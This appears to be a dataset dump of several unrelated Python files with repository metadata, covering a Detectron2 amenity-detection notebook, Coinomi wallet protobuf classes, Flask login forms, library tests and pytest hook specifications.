| 26.641221 | 84 | 0.57765 | 381 | 3,490 | 5.125984 | 0.291339 | 0.032258 | 0.036866 | 0.040963 | 0.305172 | 0.270353 | 0.168971 | 0.168971 | 0.116743 | 0.116743 | 0 | 0.004542 | 0.306017 | 3,490 | 130 | 85 | 26.846154 | 0.801817 | 0.004298 | 0 | 0.285714 | 0 | 0.014286 | 0.18876 | 0.096124 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.228571 | 0.028571 | null | null | 0.071429 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
1e97335310dcfac8d0fa86edf318c4df60dac6c3 | 4,063 | py | Python | Dectron2/Algo/amenity_algo.py | ashwath007/aminity-detection | acb885eb4d791acc6e65237445a4fc6830e4d30c | [
"Apache-2.0"
] | 1 | 2021-01-18T11:18:25.000Z | 2021-01-18T11:18:25.000Z | Dectron2/Algo/amenity_algo.py | ashwath007/aminity-detection | acb885eb4d791acc6e65237445a4fc6830e4d30c | [
"Apache-2.0"
] | null | null | null | Dectron2/Algo/amenity_algo.py | ashwath007/aminity-detection | acb885eb4d791acc6e65237445a4fc6830e4d30c | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""amenity_algo.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1JjXRbubKgw6DvQcbRjw9WcdrTYdOrPAC
"""
# Commented out IPython magic to ensure Python compatibility.
!pip install -U torch==1.4+cu100 torchvision==0.5+cu100 -f https://download.pytorch.org/whl/torch_stable.html
!pip install cython pyyaml==5.1
!pip install -U 'git+https://github.com/cocodataset/cocoapi.git#subdirectory=PythonAPI'
!pip install awscli
!pip install pillow==4.1.1
# %reload_ext autoreload
# %autoreload
import torch, torchvision
torch.__version__
!gcc --version
!pip install detectron2 -f https://dl.fbaipublicfiles.com/detectron2/wheels/cu100/index.html
# Some basic setup:
# Setup detectron2 logger
import detectron2
from detectron2.utils.logger import setup_logger
setup_logger() # this logs Detectron2 information such as what the model is doing when it's training
# import some common libraries
import numpy as np
import pandas as pd
from tqdm import tqdm
import cv2
import random
from google.colab.patches import cv2_imshow
# import some common detectron2 utilities
from detectron2 import model_zoo # a series of pre-trained Detectron2 models: https://github.com/facebookresearch/detectron2/blob/master/MODEL_ZOO.md
from detectron2.engine import DefaultPredictor # a default predictor class to make predictions on an image using a trained model
from detectron2.config import get_cfg # a config of "cfg" in Detectron2 is a series of instructions for building a model
from detectron2.utils.visualizer import Visualizer # a class to help visualize Detectron2 predictions on an image
from detectron2.data import MetadataCatalog # stores information about the model such as what the training/test data is, what the class names are
img = cv2.imread("./demo.jpeg")
cv2_imshow(img)
# Download the trained model
!wget https://storage.googleapis.com/airbnb-amenity-detection-storage/airbnb-amenity-detection/open-images-data/retinanet_model_final/retinanet_model_final.pth
# Download the train model config (instructions on how the model was built)
!wget https://storage.googleapis.com/airbnb-amenity-detection-storage/airbnb-amenity-detection/open-images-data/retinanet_model_final/retinanet_model_final_config.yaml
# Target classes with spaces removed
target_classes = ['Bathtub',
'Bed',
'Billiard table',
'Ceiling fan',
'Coffeemaker',
'Couch',
'Countertop',
'Dishwasher',
'Fireplace',
'Fountain',
'Gas stove',
'Jacuzzi',
'Kitchen & dining room table',
'Microwave oven',
'Mirror',
'Oven',
'Pillow',
'Porch',
'Refrigerator',
'Shower',
'Sink',
'Sofa bed',
'Stairs',
'Swimming pool',
'Television',
'Toilet',
'Towel',
'Tree house',
'Washing machine',
'Wine rack']
cfg = get_cfg() # setup a default config, see: https://detectron2.readthedocs.io/modules/config.html
cfg.merge_from_file("./retinanet_model_final_config.yaml") # merge the config YAML file (a set of instructions on how to build a model)
cfg.MODEL.WEIGHTS = "./retinanet_model_final.pth" # setup the model weights from the fully trained model
# Create a default Detectron2 predictor for making inference
predictor = DefaultPredictor(cfg)
# Make a prediction the example image from above
outputs = predictor(img)
# Number of predicted amenities to draw on the target image
num_amenities = 7
# Set up a visulaizer instance: https://detectron2.readthedocs.io/modules/utils.html#detectron2.utils.visualizer.Visualizer
visualizer = Visualizer(img_rgb=img[:, :, ::-1], # we have to reverse the color order otherwise we'll get blue images (BGR -> RGB)
metadata=MetadataCatalog.get(cfg.DATASETS.TEST[0]).set(thing_classes=target_classes), # we tell the visualizer what classes we're drawing (from the target classes)
scale=0.7)
# Draw the models predictions on the target image
visualizer = visualizer.draw_instance_predictions(outputs["instances"][:num_amenities].to("cpu"))
# Display the image
cv2_imshow(visualizer.get_image()[:, :, ::-1])
| 36.936364 | 187 | 0.769136 | 567 | 4,063 | 5.439153 | 0.432099 | 0.019455 | 0.036965 | 0.008431 | 0.120947 | 0.085603 | 0.085603 | 0.085603 | 0.085603 | 0.085603 | 0 | 0.01501 | 0.130938 | 4,063 | 109 | 188 | 37.275229 | 0.858397 | 0.39429 | 0 | 0 | 1 | 0 | 0.187943 | 0.027482 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.205882 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
1e977843f31b2c38edfe91b35579fdea382bb1a9 | 10,172 | py | Python | walletlib/coinomi_proto.py | satoshi-n/walletlib | 272ddf0a974a4da0f417eed632e9d028ee19bf79 | [
"Unlicense"
] | null | null | null | walletlib/coinomi_proto.py | satoshi-n/walletlib | 272ddf0a974a4da0f417eed632e9d028ee19bf79 | [
"Unlicense"
] | null | null | null | walletlib/coinomi_proto.py | satoshi-n/walletlib | 272ddf0a974a4da0f417eed632e9d028ee19bf79 | [
"Unlicense"
] | null | null | null | # Generated by the protocol buffer compiler. DO NOT EDIT!
# sources: coinomiwallet.proto
# plugin: python-betterproto
from dataclasses import dataclass
from typing import List
import betterproto
class KeyType(betterproto.Enum):
ORIGINAL = 1
ENCRYPTED_SCRYPT_AES = 2
DETERMINISTIC_MNEMONIC = 3
DETERMINISTIC_KEY = 4
class TransactionConfidenceType(betterproto.Enum):
UNKNOWN = 0
BUILDING = 1
PENDING = 2
DEAD = 3
class TransactionConfidenceSource(betterproto.Enum):
SOURCE_UNKNOWN = 0
SOURCE_NETWORK = 1
SOURCE_SELF = 2
SOURCE_TRUSTED = 3
class TransactionPool(betterproto.Enum):
UNSPENT = 4
SPENT = 5
DEAD = 10
PENDING = 16
class WalletEncryptionType(betterproto.Enum):
UNENCRYPTED = 1
ENCRYPTED_SCRYPT_AES = 2
ENCRYPTED_AES = 3
@dataclass
class PeerAddress(betterproto.Message):
ip_address: bytes = betterproto.bytes_field(1)
port: int = betterproto.uint32_field(2)
services: int = betterproto.uint64_field(3)
@dataclass
class EncryptedData(betterproto.Message):
initialisation_vector: bytes = betterproto.bytes_field(1)
encrypted_private_key: bytes = betterproto.bytes_field(2)
@dataclass
class DeterministicKey(betterproto.Message):
"""
* Data attached to a Key message that defines the data needed by the BIP32
deterministic key hierarchy algorithm.
"""
# Random data that allows us to extend a key. Without this, we can't figure
# out the next key in the chain and should just treat it as a regular
# ORIGINAL type key.
chain_code: bytes = betterproto.bytes_field(1)
# The path through the key tree. Each number is encoded in the standard form:
# high bit set for private derivation and high bit unset for public
# derivation.
path: List[int] = betterproto.uint32_field(2)
# How many children of this key have been issued, that is, given to the user
# when they requested a fresh key? For the parents of keys being handed out,
# this is always less than the true number of children: the difference is
# called the lookahead zone. These keys are put into Bloom filters so we can
# spot transactions made by clones of this wallet - for instance when
# restoring from backup or if the seed was shared between devices. If this
# field is missing it means we're not issuing subkeys of this key to users.
issued_subkeys: int = betterproto.uint32_field(3)
lookahead_size: int = betterproto.uint32_field(4)
# * Flag indicating that this key is a root of a following chain. This chain
# is following the next non-following chain. Following/followed chains
# concept is used for married keychains, where the set of keys combined
# together to produce a single P2SH multisignature address
is_following: bool = betterproto.bool_field(5)
@dataclass
class Key(betterproto.Message):
"""
* A key used to control Bitcoin spending. Either the private key, the
public key or both may be present. It is recommended that if the private
key is provided that the public key is provided too because deriving it is
slow. If only the public key is provided, the key can only be used to watch
the blockchain and verify transactions, and not for spending.
"""
type: "KeyType" = betterproto.enum_field(1)
# Either the private EC key bytes (without any ASN.1 wrapping), or the
# deterministic root seed. If the secret is encrypted, or this is a "watching
# entry" then this is missing.
secret_bytes: bytes = betterproto.bytes_field(2)
# If the secret data is encrypted, then secret_bytes is missing and this
# field is set.
encrypted_data: "EncryptedData" = betterproto.message_field(3)
# The public EC key derived from the private key. We allow both to be stored
# to avoid mobile clients having to do lots of slow EC math on startup. For
# DETERMINISTIC_MNEMONIC entries this is missing.
public_key: bytes = betterproto.bytes_field(4)
# User-provided label associated with the key.
label: str = betterproto.string_field(5)
deterministic_key: "DeterministicKey" = betterproto.message_field(6)
@dataclass
class TransactionInput(betterproto.Message):
# Hash of the transaction this input is using.
transaction_out_point_hash: bytes = betterproto.bytes_field(1)
# Index of transaction output used by this input.
transaction_out_point_index: int = betterproto.uint32_field(2)
# Script that contains the signatures/pubkeys.
script_bytes: bytes = betterproto.bytes_field(3)
# Sequence number. Currently unused, but intended for contracts in future.
sequence: int = betterproto.uint32_field(4)
# Value of connected output, if known
value: int = betterproto.int64_field(5)
@dataclass
class TransactionOutput(betterproto.Message):
value: int = betterproto.int64_field(1)
script_bytes: bytes = betterproto.bytes_field(2)
# If spent, the hash of the transaction doing the spend.
spent_by_transaction_hash: bytes = betterproto.bytes_field(3)
# If spent, the index of the transaction input of the transaction doing the
# spend.
spent_by_transaction_index: int = betterproto.int32_field(4)
@dataclass
class TransactionConfidence(betterproto.Message):
"""
* A description of the confidence we have that a transaction cannot be
reversed in the future. Parsing should be lenient, since this could change
for different applications yet we should maintain backward compatibility.
"""
# This is optional in case we add confidence types to prevent parse errors -
# backwards compatible.
type: "TransactionConfidenceType" = betterproto.enum_field(1)
# If type == BUILDING then this is the chain height at which the transaction
# was included.
appeared_at_height: int = betterproto.int32_field(2)
# If set, hash of the transaction that double spent this one into oblivion. A
# transaction can be double spent by multiple transactions in the case of
# several inputs being re-spent by several transactions but we don't bother
# to track them all, just the first. This only makes sense if type = DEAD.
overriding_transaction: bytes = betterproto.bytes_field(3)
# If type == BUILDING then this is the depth of the transaction in the
# blockchain. Zero confirmations: depth = 0, one confirmation: depth = 1 etc.
depth: int = betterproto.int32_field(4)
broadcast_by: List["PeerAddress"] = betterproto.message_field(5)
source: "TransactionConfidenceSource" = betterproto.enum_field(6)
@dataclass
class Transaction(betterproto.Message):
# See Wallet.java for detailed description of pool semantics
version: int = betterproto.int32_field(1)
time: int = betterproto.int32_field(11)
hash: bytes = betterproto.bytes_field(2)
# If pool is not present, that means either: - This Transaction is either
# not in a wallet at all (the proto is re-used elsewhere) - Or it is stored
# but for other purposes, for example, because it is the overriding
# transaction of a double spend. - Or the Pool enum got a new value which
# your software is too old to parse.
pool: "TransactionPool" = betterproto.enum_field(3)
lock_time: int = betterproto.uint32_field(4)
updated_at: int = betterproto.int64_field(5)
transaction_input: List["TransactionInput"] = betterproto.message_field(6)
transaction_output: List["TransactionOutput"] = betterproto.message_field(7)
# A list of blocks in which the transaction has been observed (on any chain).
# Also, a number used to disambiguate ordering within a block.
block_hash: List[bytes] = betterproto.bytes_field(8)
block_relativity_offsets: List[int] = betterproto.int32_field(9)
# Data describing where the transaction is in the chain.
confidence: "TransactionConfidence" = betterproto.message_field(10)
token_id: int = betterproto.int32_field(12)
@dataclass
class AddressStatus(betterproto.Message):
address: str = betterproto.string_field(1)
status: str = betterproto.string_field(2)
@dataclass
class WalletPocket(betterproto.Message):
"""* A wallet pocket"""
network_identifier: str = betterproto.string_field(1)
# A UTF8 encoded text description of the wallet that is intended for end user
# provided text.
description: str = betterproto.string_field(2)
key: List["Key"] = betterproto.message_field(3)
# The SHA256 hash of the head of the best chain seen by this wallet.
last_seen_block_hash: bytes = betterproto.bytes_field(4)
# The height in the chain of the last seen block.
last_seen_block_height: int = betterproto.uint32_field(5)
last_seen_block_time_secs: int = betterproto.int64_field(6)
transaction: List["Transaction"] = betterproto.message_field(7)
address_status: List["AddressStatus"] = betterproto.message_field(8)
@dataclass
class ScryptParameters(betterproto.Message):
"""
* The parameters used in the scrypt key derivation function. The default
values are taken from http://www.tarsnap.com/scrypt/scrypt-slides.pdf.
They can be increased - n is the number of iterations performed and r and
p can be used to tweak the algorithm - see:
http://stackoverflow.com/questions/11126315/what-are-optimal-scrypt-work-
factors
"""
salt: bytes = betterproto.bytes_field(1)
n: int = betterproto.int64_field(2)
r: int = betterproto.int32_field(3)
p: int = betterproto.int32_field(4)
@dataclass
class Wallet(betterproto.Message):
"""* A bitcoin wallet"""
# The version number of the wallet - used to detect wallets that were
# produced in the future (i.e the wallet may contain some future format this
# protobuf/ code does not know about)
version: int = betterproto.int32_field(1)
seed: "Key" = betterproto.message_field(2)
master_key: "Key" = betterproto.message_field(3)
encryption_type: "WalletEncryptionType" = betterproto.enum_field(4)
encryption_parameters: "ScryptParameters" = betterproto.message_field(5)
pockets: List["WalletPocket"] = betterproto.message_field(6)
| 41.518367 | 81 | 0.735843 | 1,405 | 10,172 | 5.235587 | 0.28968 | 0.061175 | 0.042822 | 0.053018 | 0.171561 | 0.066069 | 0.039967 | 0.012779 | 0.012779 | 0 | 0 | 0.018652 | 0.193571 | 10,172 | 244 | 82 | 41.688525 | 0.878093 | 0.467263 | 0 | 0.140351 | 1 | 0 | 0.047537 | 0.013937 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.026316 | 0 | 0.894737 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
1e9c1c4d3812edf63f576c146c1a068b5cb823cb | 1,334 | py | Python | bluesky/tests/test_olog_cb.py | AbbyGi/bluesky | 759f9c55dce97dc47513cca749a69dd861bdf58d | [
"BSD-3-Clause"
] | 43 | 2015-08-04T20:13:41.000Z | 2019-04-12T17:21:36.000Z | bluesky/tests/test_olog_cb.py | AbbyGi/bluesky | 759f9c55dce97dc47513cca749a69dd861bdf58d | [
"BSD-3-Clause"
] | 966 | 2015-07-29T16:43:21.000Z | 2019-05-09T21:02:28.000Z | bluesky/tests/test_olog_cb.py | AbbyGi/bluesky | 759f9c55dce97dc47513cca749a69dd861bdf58d | [
"BSD-3-Clause"
] | 48 | 2019-05-15T18:01:06.000Z | 2022-03-03T18:53:43.000Z | from bluesky import Msg
from bluesky.callbacks.olog import logbook_cb_factory
text = []
def f(**kwargs):
text.append(kwargs['text'])
def test_default_template(RE):
text.clear()
RE.subscribe(logbook_cb_factory(f), 'start')
RE([Msg('open_run', plan_args={}), Msg('close_run')])
assert len(text[0]) > 0
def test_trivial_template(RE):
text.clear()
RE.subscribe(logbook_cb_factory(f, desc_template='hello'), 'start')
RE([Msg('open_run', plan_args={}), Msg('close_run')])
assert text[0] == 'hello'
# smoke test the long_template
RE.subscribe(logbook_cb_factory(f, long_template='hello'), 'start')
RE([Msg('open_run', plan_args={}), Msg('close_run')])
def test_template_dispatch(RE):
disp = {'a': 'A', 'b': 'B'}
text.clear()
RE.subscribe(logbook_cb_factory(f, desc_dispatch=disp), 'start')
RE([Msg('open_run', plan_name='a', plan_args={}),
Msg('close_run')])
RE([Msg('open_run', plan_name='b', plan_args={}),
Msg('close_run')])
assert text[0] == 'A'
assert text[1] == 'B'
# smoke test the long_dispatch
RE.subscribe(logbook_cb_factory(f, long_dispatch=disp), 'start')
RE([Msg('open_run', plan_name='a', plan_args={}),
Msg('close_run')])
RE([Msg('open_run', plan_name='b', plan_args={}),
Msg('close_run')])
| 29 | 71 | 0.632684 | 195 | 1,334 | 4.076923 | 0.210256 | 0.044025 | 0.079245 | 0.10566 | 0.703145 | 0.703145 | 0.703145 | 0.622642 | 0.602516 | 0.545912 | 0 | 0.004525 | 0.171664 | 1,334 | 45 | 72 | 29.644444 | 0.714932 | 0.042729 | 0 | 0.4375 | 0 | 0 | 0.135793 | 0 | 0 | 0 | 0 | 0 | 0.125 | 1 | 0.125 | false | 0 | 0.0625 | 0 | 0.1875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
1e9d4fe08c78dd0c209780bf5c525f478d7523d8 | 416 | py | Python | venv/lib/python3.6/site-packages/pykalman/sqrt/tests/test_bierman.py | QuantTraderEd/vnpy_crypto | a1142eddaa8a7eb63cc13af30554c05718e151b1 | [
"MIT"
] | 34 | 2018-07-13T11:30:46.000Z | 2022-01-05T13:48:10.000Z | venv/lib/python3.6/site-packages/pykalman/sqrt/tests/test_bierman.py | HeyWeiPan/vnpy_crypto | 844381797a475a01c05a4e162592a5a6e3a48032 | [
"MIT"
] | null | null | null | venv/lib/python3.6/site-packages/pykalman/sqrt/tests/test_bierman.py | HeyWeiPan/vnpy_crypto | 844381797a475a01c05a4e162592a5a6e3a48032 | [
"MIT"
] | 22 | 2018-07-13T11:30:48.000Z | 2021-09-25T13:30:08.000Z | from unittest import TestCase
from pykalman.sqrt import BiermanKalmanFilter
from pykalman.tests.test_standard import KalmanFilterTests
from pykalman.datasets import load_robot
class BiermanKalmanFilterTestSuite(TestCase, KalmanFilterTests):
"""Run Kalman Filter tests on the UDU' Decomposition-based Kalman Filter"""
def setUp(self):
self.KF = BiermanKalmanFilter
self.data = load_robot()
| 32 | 79 | 0.786058 | 47 | 416 | 6.893617 | 0.617021 | 0.111111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 416 | 12 | 80 | 34.666667 | 0.920455 | 0.165865 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.5 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
1eaae9c3607b8223e9bc956287d1a238d0263d6e | 1,131 | py | Python | screenpy/questions/text_of_the_alert.py | Z-Brueske/screenpy | 1c852a49eb3821727662458fd707b9bcf48bb8cf | [
"MIT"
] | null | null | null | screenpy/questions/text_of_the_alert.py | Z-Brueske/screenpy | 1c852a49eb3821727662458fd707b9bcf48bb8cf | [
"MIT"
] | null | null | null | screenpy/questions/text_of_the_alert.py | Z-Brueske/screenpy | 1c852a49eb3821727662458fd707b9bcf48bb8cf | [
"MIT"
] | null | null | null | """
A question to discover the text of an alert. Questions must be asked with
an expected resolution, like so:
the_actor.should_see_the(
(TextOfTheAlert(), ReadsExactly("Look out!!")),
)
"""
from ..abilities import BrowseTheWeb
from ..actor import Actor
from ..pacing import beat
from .base_question import BaseQuestion
class TextOfTheAlert(BaseQuestion):
"""
Asks what text appears in the alert, viewed by an |Actor|. This
question is expected to be instantiated as it is, no static methods
for this one. The only invocation looks like:
TextOfTheAlert()
It can then be passed along to the |Actor| to ask the question.
"""
@beat("{} reads the text from the alert.")
def answered_by(self, the_actor: Actor) -> str:
"""
Asks the supplied actor to investigate the alert and give their
answer.
Args:
the_actor: the |Actor| who will answer the question.
Returns:
str: the text of the alert.
"""
alert = the_actor.uses_ability_to(BrowseTheWeb).to_switch_to_alert()
return alert.text
| 26.928571 | 76 | 0.660477 | 152 | 1,131 | 4.828947 | 0.506579 | 0.065395 | 0.024523 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.259947 | 1,131 | 41 | 77 | 27.585366 | 0.876941 | 0.567639 | 0 | 0 | 0 | 0 | 0.085271 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.444444 | 0 | 0.777778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
1ec48483cf6a812b6fdeaee84a44fdb371df5a34 | 1,522 | py | Python | test.py | MushinMiscellanea/Musically | f1bd8df3e43317213b149bda255445d6ac3a2c09 | [
"MIT"
] | null | null | null | test.py | MushinMiscellanea/Musically | f1bd8df3e43317213b149bda255445d6ac3a2c09 | [
"MIT"
] | null | null | null | test.py | MushinMiscellanea/Musically | f1bd8df3e43317213b149bda255445d6ac3a2c09 | [
"MIT"
] | null | null | null | import csv
import pandas as pd
import matplotlib as mt
pitch = pd.read_csv('/Users/spencerfinkel/repos/musically/pitch_freq.csv')
pitch = pitch.rename(columns={'Unnamed: 2': 'Octive'})
p = (list(pitch))
freq = pitch['Frequency (Hz)']
freq.head()  # preview the first frequency values
'''#frequency of all notes in a scale
for i in range(13):
freq = 16.35
freq1 = freq*((2**(1/12))**i)
print(f'{freq1:.2f}')
#list comprehension, whole octive frequencies
freq = 73.42
freqsincomprehension = [float(freq*((2**(1/12))**i)) for i in range(13)]
for item in freqsincomprehension:
print('{:.2f}'.format(item))
print()
#frequencies of minor scale
def minor_freq(*args):
for i in range(13):
freq1=freq
freq1=freq*((2**(1/12))**i)
if i == 1 or i ==4 or i == 6 or i == 9 or i ==11:
continue
else:
print(f'{freq1:.2f}')
minor_freq(freq)
print()
#all the octaves of the frequency
def octive(arg):
print()
series = [arg]
if arg > 16.35:
arg1 = arg
for oct in range(8):
arg1/=2
series.insert(0, arg1)
for oct in range(8):
arg *= 2
series.append(arg)
else:
for oct in range(8):
arg *= 2
series.append(arg)
series1 = [item for item in series if item <= 7902.13 and item >= 1.00]
#[enumerate(item) for item in series if item >= 16.35]
print(series1)
def main():
freq = float(input('What frequency are you looking for: '))
octive(freq)
main()'''
| 21.43662 | 75 | 0.574244 | 226 | 1,522 | 3.849558 | 0.362832 | 0.048276 | 0.02069 | 0.037931 | 0.236782 | 0.165517 | 0.133333 | 0.075862 | 0.075862 | 0.075862 | 0 | 0.063463 | 0.275296 | 1,522 | 70 | 76 | 21.742857 | 0.725295 | 0 | 0 | 0 | 0 | 0 | 0.325301 | 0.204819 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.375 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
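The commented-out experiments above build equal-temperament semitone series (multiply by 2**(1/12) per step) and octave series (multiply or divide by 2). A cleaned-up sketch of the same arithmetic, with hypothetical function names of my own and the file's 16.35 Hz / 7902.13 Hz range limits:

```python
def semitone_series(base, steps=13):
    """Frequencies of `steps` successive semitones starting at `base`."""
    return [base * 2 ** (i / 12) for i in range(steps)]

def octaves(freq, low=16.35, high=7902.13):
    """All octave transpositions of `freq` inside [low, high]."""
    while freq / 2 >= low:   # walk down to the lowest in-range octave
        freq /= 2
    series = []
    while freq <= high:      # then walk back up, doubling each time
        series.append(freq)
        freq *= 2
    return series
```

Doubling a frequency raises it exactly one octave, so twelve semitone steps of 2**(1/12) land on the same pitch class an octave up.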
1ec6276dbd014d4e7c628f11208c2aa3d1f62cfc | 2,410 | py | Python | source/cyoa/forms.py | eeyun/cyoa | ad619c60b1c960c2bfadda87f92637796d93ca8f | [
"Apache-2.0"
] | 3 | 2017-02-28T19:41:07.000Z | 2021-08-18T22:49:19.000Z | source/cyoa/forms.py | eeyun/cyoa | ad619c60b1c960c2bfadda87f92637796d93ca8f | [
"Apache-2.0"
] | null | null | null | source/cyoa/forms.py | eeyun/cyoa | ad619c60b1c960c2bfadda87f92637796d93ca8f | [
"Apache-2.0"
] | null | null | null | from flask_wtf import FlaskForm as Form  # the flask.ext.* import path was removed in Flask 1.0
from wtforms import StringField, PasswordField, BooleanField, SubmitField, \
    DateField, IntegerField
from wtforms.validators import Required, Length, Regexp, EqualTo
from wtforms import ValidationError

from .models import Wizard


class LoginForm(Form):
    wizard_name = StringField('Username',
                              validators=[Required(), Length(1, 32)])
    password = PasswordField('Password',
                             validators=[Required(), Length(1, 32)])

    def validate(self):
        if not Form.validate(self):
            return False
        user = Wizard.query.filter_by(
            wizard_name=self.wizard_name.data).first()
        if user is not None and not user.verify_password(self.password.data):
            self.password.errors.append('Incorrect password.')
            return False
        return True


class PresentationForm(Form):
    name = StringField('Presentation name',
                       validators=[Required(), Length(1, 60)])
    filename = StringField('File name',
                           validators=[Required(), Length(1, 255)])
    slug = StringField('URL slug',
                       validators=[Required(), Length(1, 255)])
    is_visible = BooleanField()


class DecisionForm(Form):
    slug = StringField('URL slug',
                       validators=[Required(), Length(1, 128)])
    first_path_slug = StringField('A word for the first path. Must be '
                                  'lowercase. No spaces.',
                                  validators=[Required(), Length(1, 64),
                                              Regexp('[a-z0-9]+',
                                                     message='Choice must be lowercase '
                                                             'with no whitespace.')])
    # Note: the original pattern here was '[a-z-0-9]+'; the stray hyphen
    # contradicted the error message, so it is normalized to match first_path_slug.
    second_path_slug = StringField('A word for the second path. Must be '
                                   'lowercase. No spaces.',
                                   validators=[Required(), Length(1, 64),
                                               Regexp('[a-z0-9]+',
                                                      message='Choice must be lowercase '
                                                              'with no whitespace.')])
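`LoginForm.validate` above runs the base class's per-field validators first and only then performs the cross-field password check, appending a message to the field's error list on failure. The same shape without wtforms or a database, as a runnable sketch (all names here are illustrative):

```python
class BaseForm:
    """Stand-in for wtforms.Form: pretend all per-field validators passed."""
    def validate(self):
        self.errors = []
        return True


class LoginForm(BaseForm):
    def __init__(self, username, password, lookup):
        self.username = username
        self.password = password
        self._lookup = lookup  # callable: username -> stored password, or None

    def validate(self):
        if not super().validate():   # field-level checks run first
            return False
        stored = self._lookup(self.username)
        if stored is not None and stored != self.password:
            self.errors.append('Incorrect password.')
            return False
        return True


users = {'gandalf': 'mellon'}
bad = LoginForm('gandalf', 'friend', users.get)
good = LoginForm('gandalf', 'mellon', users.get)
print(bad.validate(), good.validate())
```

Keeping the early `return False` when the base checks fail avoids reporting a password mismatch on a form whose fields are already invalid.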
| 47.254902 | 77 | 0.479668 | 206 | 2,410 | 5.563107 | 0.38835 | 0.109948 | 0.167539 | 0.17452 | 0.422339 | 0.319372 | 0.319372 | 0.267016 | 0.184991 | 0.106457 | 0 | 0.022496 | 0.428216 | 2,410 | 50 | 78 | 48.2 | 0.809144 | 0 | 0 | 0.325581 | 0 | 0 | 0.123237 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.023256 | false | 0.093023 | 0.116279 | 0 | 0.488372 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
1edd90a13cef945adf99324275344c4e5387f197 | 1,473 | py | Python | pytest_never_sleep/hooks.py | DKorytkin/pytest-never-sleep | e655fbff4d51b8a7e41a56e584dae55013f7160f | [
"MIT"
] | null | null | null | pytest_never_sleep/hooks.py | DKorytkin/pytest-never-sleep | e655fbff4d51b8a7e41a56e584dae55013f7160f | [
"MIT"
] | 2 | 2021-05-19T07:55:13.000Z | 2021-05-21T09:49:05.000Z | pytest_never_sleep/hooks.py | DKorytkin/pytest-never-sleep | e655fbff4d51b8a7e41a56e584dae55013f7160f | [
"MIT"
] | null | null | null | import pytest

# These are specifications, so no implementation:
# pylint: disable=unused-argument


@pytest.hookspec(firstresult=True)
def pytest_never_sleep_whitelist():
    """
    This hook lets you add your own paths where `time.sleep` is allowed,
    so the plugin will skip raising errors for them.

    Returns
    -------
    Tuple[str]

    Usage in conftest:
    >>> def pytest_never_sleep_whitelist():
    >>>     return "root_dir.folder.module", "root_dir.folder_two."
    """


@pytest.hookspec(firstresult=True)
def pytest_never_sleep_message_format(config, frame):
    """
    In this hook you can override the default message format with your own.

    Useful frame attributes:
        f_back - next outer frame object
        f_builtins - builtins namespace seen by this frame
        f_code - code object being executed in this frame
        f_globals - global namespace seen by this frame
        f_lasti - index of last attempted instruction in bytecode
        f_lineno - current line number in Python source code
        f_locals - local namespace seen by this frame
        f_trace - tracing function for this frame, or None
    https://docs.python.org/3/library/inspect.html

    Parameters
    ----------
    config: _pytest.config.Config
    frame: frame

    Returns
    -------
    str

    Usage in conftest:
    >>> def pytest_never_sleep_message_format(config, frame):
    >>>     return "{}:{}".format(frame.f_code.co_filename, frame.f_code.co_firstlineno)
    """
